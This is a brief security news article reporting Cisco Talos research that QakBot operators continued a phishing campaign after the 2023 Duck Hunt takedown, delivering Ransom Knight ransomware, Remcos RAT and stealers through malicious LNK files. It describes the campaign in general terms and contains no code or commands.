Despite the disruption to its infrastructure, the threat actors behind the QakBot malware have been linked to an ongoing phishing campaign since early August 2023 that led to the delivery of Ransom Knight (aka Cyclops) ransomware and Remcos RAT.
This indicates that “the law enforcement operation may not have impacted Qakbot operators’ spam delivery infrastructure but rather only their command-and-control (C2) servers,” Cisco Talos researcher Guilherme Venere said in a new report published today.
QakBot, also called QBot and Pinkslipbot, originated as a Windows-based banking trojan in 2007 and subsequently developed capabilities to deliver additional payloads, including ransomware. In late August 2023, the notorious malware operation was dealt a blow as part of an operation named Duck Hunt.
The latest activity, which commenced just before the takedown, starts with a malicious LNK file likely distributed via phishing emails that, when launched, detonates the infection and ultimately deploys the Ransom Knight ransomware, a recent rebrand of the Cyclops ransomware-as-a-service (RaaS) scheme.
“Given the operators remain active, they may choose to rebuild Qakbot infrastructure to fully resume their pre-takedown activity.”
Cisco Talos told The Hacker News that the attack chains are also being used to deliver other malware such as DarkGate, MetaStealer, and RedLine Stealer.
“Identifying the true scope is difficult but as we’ve already seen the QakBot distribution network is highly effective and has the ability to push large scale campaigns,” Venere told the publication.
“We have observed phishing emails distributing these malware to Italian, German, and English victims which shows the campaign is widespread.”
Source: https://thehackernews.com/2023